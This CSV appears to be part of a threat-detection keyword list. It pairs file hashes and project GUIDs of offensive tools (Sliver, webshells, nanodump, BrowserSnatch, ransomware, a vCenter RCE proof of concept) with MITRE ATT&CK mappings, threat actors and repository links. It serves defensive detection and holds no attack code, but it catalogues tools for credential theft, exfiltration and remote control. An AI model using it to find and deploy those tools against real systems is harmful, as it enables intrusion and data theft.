"*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*",".{0,1000}08AEC00F\-42ED\-4E62\-AE8D\-0BFCE30A3F57.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#GUIDproject","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","21287"
"*08b75b7485c6cfd8be9f0820b14fc6b449a4dae683286a2aab0c0bd21ef35707*",".{0,1000}08b75b7485c6cfd8be9f0820b14fc6b449a4dae683286a2aab0c0bd21ef35707.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21288"
"*08bb37b35346a2fc5bcc4c56ed101a95072de5bf7b5af36273d1277807c43a3e*",".{0,1000}08bb37b35346a2fc5bcc4c56ed101a95072de5bf7b5af36273d1277807c43a3e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21289"
"*08bdf0baeae215d62da086a06124b26d50d1f77ab021c17a849084648daa7d35*",".{0,1000}08bdf0baeae215d62da086a06124b26d50d1f77ab021c17a849084648daa7d35.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21291"
"*08bec0a0da412feaad0cd339162179c50edd5bc75a0fa1d25fa95c00f2437f85*",".{0,1000}08bec0a0da412feaad0cd339162179c50edd5bc75a0fa1d25fa95c00f2437f85.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21292"
"*08bf766742ad601442e6200717c9a5ca004de85c350353dd2793b5c29e1db995*",".{0,1000}08bf766742ad601442e6200717c9a5ca004de85c350353dd2793b5c29e1db995.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21293"
"*08c4e8f76bbf766917611b1d53774ff6ac69edd31aff71ab5c344d59f606c4e9*",".{0,1000}08c4e8f76bbf766917611b1d53774ff6ac69edd31aff71ab5c344d59f606c4e9.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21294"
"*08ca5b5dae3c18f7a5bed317a0650f8f015207facf43ec829b9a3cf7fa63ffa2*",".{0,1000}08ca5b5dae3c18f7a5bed317a0650f8f015207facf43ec829b9a3cf7fa63ffa2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21295"
"*08cebde6781422f271581951ff6db23b9eedd4a0be0949551c0da85c6de8cb72*",".{0,1000}08cebde6781422f271581951ff6db23b9eedd4a0be0949551c0da85c6de8cb72.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","21297"
"*08d43f94bbdc5f8b1ec034b09c6d2536d50dd92f9132e61c4ec85a716487c6ba*",".{0,1000}08d43f94bbdc5f8b1ec034b09c6d2536d50dd92f9132e61c4ec85a716487c6ba.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21298"
"*08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D*",".{0,1000}08DBC2BF\-E9F3\-4AE4\-B0CC\-6E9C8767982D.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","21299"
"*08e4c0ff7e4631b54fc848a95a15be134089e2422cc173f96ae11ee3e803d95d*",".{0,1000}08e4c0ff7e4631b54fc848a95a15be134089e2422cc173f96ae11ee3e803d95d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21302"
"*08ec751857b68b0501f0d810f45f9020e6afb307ec536c139a1801e95d870be8*",".{0,1000}08ec751857b68b0501f0d810f45f9020e6afb307ec536c139a1801e95d870be8.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21303"
"*08eca2f2424877b698312c5aa652d016398dbc0d811326202cddeedfaa8700b5*",".{0,1000}08eca2f2424877b698312c5aa652d016398dbc0d811326202cddeedfaa8700b5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21304"
"*08f0007bf2c941bb9372682e9cdcc21e59369b6038c70a7a20a7d3507abaa86d*",".{0,1000}08f0007bf2c941bb9372682e9cdcc21e59369b6038c70a7a20a7d3507abaa86d.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","21307"
"*08f1f067fdfc22fd7075eb73a2cdec749cf0052ccd0672954617b7e49eb1ca40*",".{0,1000}08f1f067fdfc22fd7075eb73a2cdec749cf0052ccd0672954617b7e49eb1ca40.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","21308"
"*0901aac4feb3ef12677e64599acc30daf72ab2e3227ab46db8b06a6e8a5c2070*",".{0,1000}0901aac4feb3ef12677e64599acc30daf72ab2e3227ab46db8b06a6e8a5c2070.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","21311"
"*0904cc6e027548759b2b2f917e20202a02b86bab3ec33cf01c5d4d8064eec584*",".{0,1000}0904cc6e027548759b2b2f917e20202a02b86bab3ec33cf01c5d4d8064eec584.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21312"
"*090600985a1db310b138b87ad8eb42f1db810379974a790a30c9cc8d55e81c17*",".{0,1000}090600985a1db310b138b87ad8eb42f1db810379974a790a30c9cc8d55e81c17.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21313"
"*09086d1efecc096e7418987b2a4733595afd2bdcf1d1073a53bc7f4eba4e8833*",".{0,1000}09086d1efecc096e7418987b2a4733595afd2bdcf1d1073a53bc7f4eba4e8833.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21314"
"*0908e1cfbd62968eea9ae9a3c772b6f134770c72b503affde0d551c8a55447c5*",".{0,1000}0908e1cfbd62968eea9ae9a3c772b6f134770c72b503affde0d551c8a55447c5.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#filehash","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","21315"
"*09104e5185bde84d4d5043b07bf067e190fa541ed07dfe23a8374adab15f1969*",".{0,1000}09104e5185bde84d4d5043b07bf067e190fa541ed07dfe23a8374adab15f1969.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21317"
"*092ac8a6ca4a373a9788724e2b89c69785312fc7d7d10af083a3b480a58178b2*",".{0,1000}092ac8a6ca4a373a9788724e2b89c69785312fc7d7d10af083a3b480a58178b2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21322"
"*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*",".{0,1000}09323E4D\-BE0F\-452A\-9CA8\-B07D2CFA9804.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","#GUIDproject","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","21323"
"*09348db398b0f762f8bf72cc8fd76268833be266918c177c82bdb05e28c79c47*",".{0,1000}09348db398b0f762f8bf72cc8fd76268833be266918c177c82bdb05e28c79c47.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21325"
"*09387bf7e4ca97704227fb00618e4056be0852acd1885841da239162457542d4*",".{0,1000}09387bf7e4ca97704227fb00618e4056be0852acd1885841da239162457542d4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21326"
"*09407d2e3ac7d6af13c407d17ec8e51b6d1b1d8271df65ebd0b3ffbab420b2fe*",".{0,1000}09407d2e3ac7d6af13c407d17ec8e51b6d1b1d8271df65ebd0b3ffbab420b2fe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","21327"
"*09480a5f53d380fcec0fd43f60435c4d6ad9d3decca9cfa419614353f1557a48*",".{0,1000}09480a5f53d380fcec0fd43f60435c4d6ad9d3decca9cfa419614353f1557a48.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","21328"
"*0950b4561ed9e9dce2ce89ee2cd3e4c740700c399c6b8006afb1c9419569a1a7*",".{0,1000}0950b4561ed9e9dce2ce89ee2cd3e4c740700c399c6b8006afb1c9419569a1a7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21330"
"*0953f449b99d30bbf1f38beb8e820b996c29ab9b756867bf54819a58b020c05b*",".{0,1000}0953f449b99d30bbf1f38beb8e820b996c29ab9b756867bf54819a58b020c05b.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21332"
"*0954c8a613c18097f0086265db97e819d44346d52752c8d760a90e5bc6888f98*",".{0,1000}0954c8a613c18097f0086265db97e819d44346d52752c8d760a90e5bc6888f98.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21333"
"*0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084*",".{0,1000}0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21334"
"*095a6fc6a2c9647417df017fa70b182abcc68b97a8addd4e25cf302f6f2e98e4*",".{0,1000}095a6fc6a2c9647417df017fa70b182abcc68b97a8addd4e25cf302f6f2e98e4.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#filehash","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","21335"
"*0968703e426943707b405b5c5bb0ca14ce2e21c8f125954d8ab26c808f45dc47*",".{0,1000}0968703e426943707b405b5c5bb0ca14ce2e21c8f125954d8ab26c808f45dc47.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21340"
"*0971A047-A45A-43F4-B7D8-16AC1114B524*",".{0,1000}0971A047\-A45A\-43F4\-B7D8\-16AC1114B524.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","#GUIDproject","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","21341"
"*0971aee212257aba1a537747e492b76aff0020623edb68defd378e8ed069f6a8*",".{0,1000}0971aee212257aba1a537747e492b76aff0020623edb68defd378e8ed069f6a8.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","21342"
"*097480e794bb20660bd64c5fd4814d9aac0135710b28a85ca643422041773dc6*",".{0,1000}097480e794bb20660bd64c5fd4814d9aac0135710b28a85ca643422041773dc6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21343"
"*097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e*",".{0,1000}097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","21344"
"*09764c124174dfc424e00b57c8464025dc6bbfcae62e709bf505a7eece480173*",".{0,1000}09764c124174dfc424e00b57c8464025dc6bbfcae62e709bf505a7eece480173.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21345"
"*0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced*",".{0,1000}0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21346"
"*097a7a15058a4623f758a7667857145abe680a97c61255e2aa8f6086ee4fe365*",".{0,1000}097a7a15058a4623f758a7667857145abe680a97c61255e2aa8f6086ee4fe365.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21347"
"*09855e8685bbec09962affefbfad2c554d434a87aca1e1ac8c961f5ebfe6cdad*",".{0,1000}09855e8685bbec09962affefbfad2c554d434a87aca1e1ac8c961f5ebfe6cdad.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","#filehash","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","21349"
"*09877a6147033fd5a670e8828058d51d71926e684e53582bff7d5c27b6f9501e*",".{0,1000}09877a6147033fd5a670e8828058d51d71926e684e53582bff7d5c27b6f9501e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21350"
"*0988d2c24c478d4918d1aebd99817d7d84d0a6997fffed713fada3338636b62a*",".{0,1000}0988d2c24c478d4918d1aebd99817d7d84d0a6997fffed713fada3338636b62a.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","21351"
"*099923b629ff4309a579a66eaa857de4e5d5caa093b6226ee7c491742d9168e9*",".{0,1000}099923b629ff4309a579a66eaa857de4e5d5caa093b6226ee7c491742d9168e9.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","21352"
"*0999e7ec2eaa95fded99e6b8cb3ffd5ae372a896731cef3eb5bdb0b8977e64f4*",".{0,1000}0999e7ec2eaa95fded99e6b8cb3ffd5ae372a896731cef3eb5bdb0b8977e64f4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21353"
"*0999ff434753baea877027af71dc4f7ed5866e3647f19d9707063e3a0a7b61f2*",".{0,1000}0999ff434753baea877027af71dc4f7ed5866e3647f19d9707063e3a0a7b61f2.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21354"
"*099b726fb0a1160c72e7f8ea20313721f9a060b48eb95bb9c5b7aaee948439c2*",".{0,1000}099b726fb0a1160c72e7f8ea20313721f9a060b48eb95bb9c5b7aaee948439c2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21355"
"*099c3eb732a58c9f6c99b0920f10a1d516577009c1c2ac1a1da4133a7092db57*",".{0,1000}099c3eb732a58c9f6c99b0920f10a1d516577009c1c2ac1a1da4133a7092db57.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#filehash","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","21356"
